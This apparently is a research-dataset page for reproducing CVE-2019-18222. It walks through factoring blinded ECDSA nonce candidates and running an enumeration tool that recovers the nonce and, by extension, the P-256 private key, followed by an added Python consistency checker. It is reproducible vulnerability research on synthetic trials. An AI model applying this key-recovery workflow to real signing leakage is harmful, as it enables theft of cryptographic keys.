
CVE-2019-18222: research data and tooling

Indexed by NIAID Data Ecosystem, 2026-03-11
Download link:
https://zenodo.org/record/3605804
Resource description:
This dataset and software tool are for reproducing the research results related to CVE-2019-18222.

Description

enum contains the key enumeration tool.

kt_candidates contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields:
- kt_candidates: list of nonce candidates.

sig_data contains the JSON for ECDSA signatures, indexed by trial number. JSON fields:
- p: the prime the curve is defined over (P-256 here).
- Gx, Gy: generator coordinates.
- d: ground truth ECDSA long-term key.
- Px, Py: public key coordinates.
- h: SHA-256 digest to sign, encoded to the finite field.
- k: ground truth ECDSA nonce.
- r, s: ECDSA signature.

Build

```
cd enum
make clean
make
```

Run

Start with enum as the working directory.

```
cd enum
```

Pull out a kt candidate, in this example index 847.

```
$ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json
[
  "0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0"
]
```

Factor that candidate.

```
$ time sage -c "print ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0)"
[2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833]

real    0m5.837s
user    0m5.648s
sys     0m0.214s
```

Now pull out the r component of the ECDSA signature for that index, and convert it from hex to base 10.

```
$ jq '.r' ../sig_data/sig_data_847.json
"0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
$ python -c "print 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
22111746808803128586382711090186612204136854333384650261207856620766542674791
```

Now run the enum tool to recover the nonce.

```
$ ./enum
Usage: ./enum space delimited flat list of factors in base ten
```

The first two arguments ease parallel execution; read the source code. For a single core, pass them as 1 0.

```
$ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 283135469779419532841 572987990320782777757565685333349772719941819448953457732874126833
INFO:target:30E2CE20A8140177A31A66763D85F431ACC9790DD050FFC22ED5D454CDFBBB67
INFO:found:31A52C4960857E6D2F7AD82BAC7D55CE6CC9AD13B959F069002B6A949EA6A048
INFO:tests:7879
```

where 221..791 is the base-10 r component of the ECDSA signature, and 2 2 .. 572..833 is the full list of blinded nonce factors. In the output:
- INFO:target: is the hex form of the base-10 target input (ECDSA r component).
- INFO:found: is the hex form of the recovered ECDSA nonce.
- INFO:tests: is the number of tested nonce candidates (scalar multiplications).

We can see this successfully recovered the nonce (hence the long-term ECDSA private key) correctly:

```
$ jq '.k' ../sig_data/sig_data_847.json
"0x31a52c4960857e6d2f7ad82bac7d55ce6cc9ad13b959f069002b6a949ea6a048"
```
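As an added example (not part of the Zenodo record or of the enum tool), the following Python script checks one trial of the dataset for internal consistency with a minimal P-256 implementation: the ground-truth nonce k must reproduce the signature's r as x(kG) mod n, and the blinded candidate kt must be an exact multiple of k, which is what recovering k from the factors of kt presupposes. The trial values are the ones quoted above for index 847; the P-256 domain parameters are the standard ones, and the check function names are my own.

```python
# Added example, not from the dataset or the enum tool: verify that one trial's
# ground-truth nonce k really produces the recorded r, and that the blinded
# candidate kt is a multiple of k. Standard P-256 (secp256r1) parameters below.

P  = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A  = P - 3
N  = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
G  = (GX, GY)

def ec_add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None                                   # Q + (-Q) = O
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P  # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def ec_mul(k, point=G):
    """Double-and-add scalar multiplication (not constant time; a checker only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, point)
        point = ec_add(point, point)
        k >>= 1
    return acc

def ecdsa_r(k):
    """The r component an ECDSA signer produces for nonce k: x(kG) mod n."""
    return ec_mul(k)[0] % N

def check_trial(r, k, kt):
    """True if r == x(kG) mod n and the blinded candidate kt is a multiple of k."""
    return ecdsa_r(k) == r and kt % k == 0

# Values copied from the trial-847 walkthrough on this page
R_847  = 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67
K_847  = 0x31a52c4960857e6d2f7ad82bac7d55ce6cc9ad13b959f069002b6a949ea6a048
KT_847 = 0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0

if __name__ == "__main__":
    print("trial 847 consistent:", check_trial(R_847, K_847, KT_847))
```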
Created: 2020-01-24